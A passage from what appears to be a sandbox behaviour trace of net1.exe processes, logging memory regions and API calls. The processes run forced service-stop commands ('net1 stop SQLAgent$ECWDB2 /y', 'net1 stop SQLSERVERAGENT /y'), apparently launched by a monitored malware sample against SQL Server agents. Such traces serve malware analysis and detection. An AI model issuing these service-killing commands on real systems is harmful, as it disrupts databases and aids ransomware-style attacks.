0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 11020 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 11021 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 11022 start_va = 0x60000 end_va = 0x6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 11023 start_va = 0xa0000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 11024 start_va = 0x1a0000 end_va = 0x206fff entry_point = 0x1a0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 11025 start_va = 0x290000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 11026 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 11027 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 11028 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 11029 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 11030 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 11031 start_va = 0x7fefb6e0000 end_va = 0x7fefb6f1fff entry_point = 0x7fefb6e0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 11032 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 11033 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 11034 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 11035 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 11036 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 11037 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 11038 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 11039 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 11040 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 11041 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 11042 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 11043 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 11044 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 11045 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 11096 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 817 os_tid = 0xb40 [0114.356] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28ff30 | out: lpSystemTimeAsFileTime=0x28ff30*(dwLowDateTime=0xf94fdff0, dwHighDateTime=0x1d48689)) [0114.356] GetCurrentProcessId () returned 0x96c [0114.356] GetCurrentThreadId () returned 0xb40 [0114.356] GetTickCount () returned 0x2647c [0114.356] QueryPerformanceCounter (in: lpPerformanceCount=0x28ff38 | out: lpPerformanceCount=0x28ff38*=1816127400000) returned 1 [0114.356] GetModuleHandleW (lpModuleName=0x0) returned 0xff3d0000 [0114.356] __set_app_type (_Type=0x1) [0114.356] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff3e9c9c) returned 0x0 [0114.357] __getmainargs (in: _Argc=0xff3f4780, _Argv=0xff3f4790, _Env=0xff3f4788, _DoWildCard=0, _StartInfo=0xff3f479c | out: _Argc=0xff3f4780, _Argv=0xff3f4790, _Env=0xff3f4788) returned 0 [0114.357] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0114.357] GetConsoleOutputCP () returned 0x1b5 [0114.440] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff3fcec0 | out: lpCPInfo=0xff3fcec0) returned 1 [0114.440] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0114.442] sprintf_s (in: _DstBuf=0x28fed8, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0114.443] setlocale (category=0, locale=".437") returned="English_United States.437" [0114.444] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0114.444] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0114.444] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLAgent$ECWDB2 /y" [0114.444] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x28fc70, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0114.444] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0114.444] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x28fec8 | out: Buffer=0x28fec8*=0xb4d50) returned 0x0 [0114.444] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x28fec8 | out: Buffer=0x28fec8*=0xbc100) returned 0x0 [0114.444] _fileno (_File=0x7fefdba2a80) returned 0 [0114.444] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0114.445] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0114.445] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0114.445] _wcsicmp (_String1="config", _String2="stop") returned -16 [0114.445] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0114.445] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0114.445] _wcsicmp (_String1="file", _String2="stop") returned -13 [0114.445] _wcsicmp (_String1="files", _String2="stop") returned -13 [0114.445] _wcsicmp (_String1="group", _String2="stop") returned -12 [0114.445] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0114.445] _wcsicmp (_String1="help", _String2="stop") returned -11 [0114.445] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0114.445] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0114.445] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0114.445] _wcsicmp (_String1="session", _String2="stop") returned -15 [0114.445] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0114.445] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0114.445] _wcsicmp (_String1="share", _String2="stop") returned -12 [0114.445] _wcsicmp (_String1="start", _String2="stop") returned -14 [0114.445] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0114.445] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0114.445] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0114.445] _wcsicmp (_String1="accounts", _String2="SQLAgent$ECWDB2") returned -18 [0114.445] _wcsicmp (_String1="computer", _String2="SQLAgent$ECWDB2") returned -16 [0114.445] _wcsicmp (_String1="config", _String2="SQLAgent$ECWDB2") returned -16 [0114.445] _wcsicmp (_String1="continue", _String2="SQLAgent$ECWDB2") returned -16 [0114.445] _wcsicmp (_String1="cont", _String2="SQLAgent$ECWDB2") returned -16 [0114.445] _wcsicmp (_String1="file", _String2="SQLAgent$ECWDB2") returned -13 [0114.445] _wcsicmp (_String1="files", _String2="SQLAgent$ECWDB2") returned -13 [0114.445] _wcsicmp (_String1="group", _String2="SQLAgent$ECWDB2") returned -12 [0114.445] _wcsicmp (_String1="groups", _String2="SQLAgent$ECWDB2") returned -12 [0114.445] _wcsicmp (_String1="help", _String2="SQLAgent$ECWDB2") returned -11 [0114.445] _wcsicmp (_String1="helpmsg", _String2="SQLAgent$ECWDB2") returned -11 [0114.445] _wcsicmp (_String1="localgroup", _String2="SQLAgent$ECWDB2") returned -7 [0114.445] _wcsicmp (_String1="pause", _String2="SQLAgent$ECWDB2") returned -3 [0114.446] _wcsicmp (_String1="session", _String2="SQLAgent$ECWDB2") returned -12 [0114.446] _wcsicmp (_String1="sessions", _String2="SQLAgent$ECWDB2") returned -12 [0114.446] _wcsicmp (_String1="sess", _String2="SQLAgent$ECWDB2") returned -12 [0114.446] _wcsicmp (_String1="share", _String2="SQLAgent$ECWDB2") returned -9 [0114.446] _wcsicmp (_String1="start", _String2="SQLAgent$ECWDB2") returned 3 [0114.446] _wcsicmp (_String1="stats", _String2="SQLAgent$ECWDB2") returned 3 [0114.446] _wcsicmp (_String1="statistics", _String2="SQLAgent$ECWDB2") returned 3 [0114.446] _wcsicmp (_String1="stop", _String2="SQLAgent$ECWDB2") returned 3 [0114.446] _wcsicmp (_String1="time", _String2="SQLAgent$ECWDB2") returned 1 [0114.446] _wcsicmp (_String1="user", _String2="SQLAgent$ECWDB2") returned 2 [0114.446] _wcsicmp (_String1="users", _String2="SQLAgent$ECWDB2") returned 2 [0114.446] _wcsicmp (_String1="msg", _String2="SQLAgent$ECWDB2") returned -6 [0114.446] _wcsicmp (_String1="messenger", _String2="SQLAgent$ECWDB2") returned -6 [0114.446] _wcsicmp (_String1="receiver", _String2="SQLAgent$ECWDB2") returned -1 [0114.446] _wcsicmp (_String1="rcv", _String2="SQLAgent$ECWDB2") returned -1 [0114.446] _wcsicmp (_String1="netpopup", _String2="SQLAgent$ECWDB2") returned -5 [0114.446] _wcsicmp (_String1="redirector", _String2="SQLAgent$ECWDB2") returned -1 [0114.446] _wcsicmp (_String1="redir", _String2="SQLAgent$ECWDB2") returned -1 [0114.446] _wcsicmp (_String1="rdr", _String2="SQLAgent$ECWDB2") returned -1 [0114.446] _wcsicmp (_String1="workstation", _String2="SQLAgent$ECWDB2") returned 4 [0114.446] _wcsicmp (_String1="work", _String2="SQLAgent$ECWDB2") returned 4 [0114.446] _wcsicmp (_String1="wksta", _String2="SQLAgent$ECWDB2") returned 4 [0114.446] _wcsicmp (_String1="prdr", _String2="SQLAgent$ECWDB2") returned -3 [0114.446] _wcsicmp (_String1="devrdr", _String2="SQLAgent$ECWDB2") returned -15 [0114.446] _wcsicmp (_String1="lanmanworkstation", _String2="SQLAgent$ECWDB2") returned -7 [0114.446] _wcsicmp (_String1="server", _String2="SQLAgent$ECWDB2") returned -12 [0114.446] _wcsicmp (_String1="svr", _String2="SQLAgent$ECWDB2") returned 5 [0114.446] _wcsicmp (_String1="srv", _String2="SQLAgent$ECWDB2") returned 1 [0114.446] _wcsicmp (_String1="lanmanserver", _String2="SQLAgent$ECWDB2") returned -7 [0114.446] _wcsicmp (_String1="alerter", _String2="SQLAgent$ECWDB2") returned -18 [0114.446] _wcsicmp (_String1="netlogon", _String2="SQLAgent$ECWDB2") returned -5 [0114.446] _wcsupr (in: _String="SQLAgent$ECWDB2" | out: _String="SQLAGENT$ECWDB2") returned="SQLAGENT$ECWDB2" [0114.447] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0xbce10 [0114.450] GetServiceKeyNameW (in: hSCManager=0xbce10, lpDisplayName="SQLAGENT$ECWDB2", lpServiceName=0xff3f5750, lpcchBuffer=0x28fde8 | out: lpServiceName="", lpcchBuffer=0x28fde8) returned 0 [0114.451] _wcsicmp (_String1="msg", _String2="SQLAGENT$ECWDB2") returned -6 [0114.451] _wcsicmp (_String1="messenger", _String2="SQLAGENT$ECWDB2") returned -6 [0114.451] _wcsicmp (_String1="receiver", _String2="SQLAGENT$ECWDB2") returned -1 [0114.451] _wcsicmp (_String1="rcv", _String2="SQLAGENT$ECWDB2") returned -1 [0114.451] _wcsicmp (_String1="redirector", _String2="SQLAGENT$ECWDB2") returned -1 [0114.451] _wcsicmp (_String1="redir", _String2="SQLAGENT$ECWDB2") returned -1 [0114.451] _wcsicmp (_String1="rdr", _String2="SQLAGENT$ECWDB2") returned -1 [0114.451] _wcsicmp (_String1="workstation", _String2="SQLAGENT$ECWDB2") returned 4 [0114.451] _wcsicmp (_String1="work", _String2="SQLAGENT$ECWDB2") returned 4 [0114.451] _wcsicmp (_String1="wksta", _String2="SQLAGENT$ECWDB2") returned 4 [0114.452] _wcsicmp (_String1="prdr", _String2="SQLAGENT$ECWDB2") returned -3 [0114.452] _wcsicmp (_String1="devrdr", _String2="SQLAGENT$ECWDB2") returned -15 [0114.452] _wcsicmp (_String1="lanmanworkstation", _String2="SQLAGENT$ECWDB2") returned -7 [0114.452] _wcsicmp (_String1="server", _String2="SQLAGENT$ECWDB2") returned -12 [0114.452] _wcsicmp (_String1="svr", _String2="SQLAGENT$ECWDB2") returned 5 [0114.452] _wcsicmp (_String1="srv", _String2="SQLAGENT$ECWDB2") returned 1 [0114.452] _wcsicmp (_String1="lanmanserver", _String2="SQLAGENT$ECWDB2") returned -7 [0114.452] _wcsicmp (_String1="alerter", _String2="SQLAGENT$ECWDB2") returned -18 [0114.452] _wcsicmp (_String1="netlogon", _String2="SQLAGENT$ECWDB2") returned -5 [0114.452] NetServiceControl (in: servername=0x0, service="SQLAGENT$ECWDB2", opcode=0x0, arg=0x0, bufptr=0x28fdf0 | out: bufptr=0x28fdf0) returned 0x889 [0114.452] wcscpy_s (in: _Destination=0xff3f80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0114.452] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0114.453] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff3f5b50, nSize=0x800, Arguments=0xff3f7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0114.454] GetFileType (hFile=0xb) returned 0x2 [0114.455] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x28fcb8 | out: lpMode=0x28fcb8) returned 1 [0114.455] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff3f5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x28fcb0, lpReserved=0x0 | out: lpBuffer=0xff3f5b50*, lpNumberOfCharsWritten=0x28fcb0*=0x1e) returned 1 [0114.455] GetFileType (hFile=0xb) returned 0x2 [0114.455] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x28fcb8 | out: lpMode=0x28fcb8) returned 1 [0114.455] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff3d1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28fcb0, lpReserved=0x0 | out: lpBuffer=0xff3d1efc*, lpNumberOfCharsWritten=0x28fcb0*=0x2) returned 1 [0114.456] _ultow (in: _Dest=0x889, _Radix=2686240 | out: _Dest=0x889) returned="2185" [0114.456] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff3f5b50, nSize=0x800, Arguments=0xff3f7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0114.456] GetFileType (hFile=0xb) returned 0x2 [0114.456] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x28fcb8 | out: lpMode=0x28fcb8) returned 1 [0114.456] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff3f5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x28fcb0, lpReserved=0x0 | out: lpBuffer=0xff3f5b50*, lpNumberOfCharsWritten=0x28fcb0*=0x34) returned 1 [0114.456] GetFileType (hFile=0xb) returned 0x2 [0114.457] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x28fcb8 | out: lpMode=0x28fcb8) returned 1 [0114.457] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff3d1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28fcb0, lpReserved=0x0 | out: lpBuffer=0xff3d1efc*, lpNumberOfCharsWritten=0x28fcb0*=0x2) returned 1 [0114.457] NetApiBufferFree (Buffer=0xb4d50) returned 0x0 [0114.457] NetApiBufferFree (Buffer=0xbc100) returned 0x0 [0114.457] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLAgent$ECWDB2 /y" [0114.457] exit (_Code=2) Process: id = "307" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x20ce4000" os_pid = "0x9b0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "293" os_parent_pid = "0x8b0" cmd_line = "C:\\Windows\\system32\\net1 stop SQLSERVERAGENT /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11046 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 11047 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 11048 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 11049 start_va = 0x190000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 11050 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11051 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 11052 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 11053 start_va = 0xff3d0000 end_va = 0xff402fff entry_point = 0xff3d0000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 11054 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 11055 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 11056 start_va = 0x7fffffd9000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 11057 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 11058 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 11059 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 11060 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 11061 start_va = 0x260000 end_va = 0x35ffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 11062 start_va = 0x360000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 11063 start_va = 0x4b0000 end_va = 0x4bffff entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 11064 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 11065 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 11066 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 11067 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 11068 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 11069 start_va = 0x7fefb6e0000 end_va = 0x7fefb6f1fff entry_point = 0x7fefb6e0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 11070 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 11071 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 11072 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 11073 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 11074 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 11075 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 11076 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 11077 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 11078 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 11079 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 11080 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 11081 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 11082 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 11083 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 11109 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 818 os_tid = 0x9e8 [0114.405] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20fd90 | out: lpSystemTimeAsFileTime=0x20fd90*(dwLowDateTime=0xf9570410, dwHighDateTime=0x1d48689)) [0114.405] GetCurrentProcessId () returned 0x9b0 [0114.405] GetCurrentThreadId () returned 0x9e8 [0114.405] GetTickCount () returned 0x264ab [0114.405] QueryPerformanceCounter (in: lpPerformanceCount=0x20fd98 | out: lpPerformanceCount=0x20fd98*=1816132300000) returned 1 [0114.405] GetModuleHandleW (lpModuleName=0x0) returned 0xff3d0000 [0114.405] __set_app_type (_Type=0x1) [0114.405] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff3e9c9c) returned 0x0 [0114.405] __getmainargs (in: _Argc=0xff3f4780, _Argv=0xff3f4790, _Env=0xff3f4788, _DoWildCard=0, _StartInfo=0xff3f479c | out: _Argc=0xff3f4780, _Argv=0xff3f4790, _Env=0xff3f4788) returned 0 [0114.406] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0114.406] GetConsoleOutputCP () returned 0x1b5 [0114.469] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff3fcec0 | out: lpCPInfo=0xff3fcec0) returned 1 [0114.469] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0114.471] sprintf_s (in: _DstBuf=0x20fd38, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0114.472] setlocale (category=0, locale=".437") returned="English_United States.437" [0114.473] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0114.474] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0114.474] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLSERVERAGENT /y" [0114.474] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x20fad0, nSize=0x104 | out: 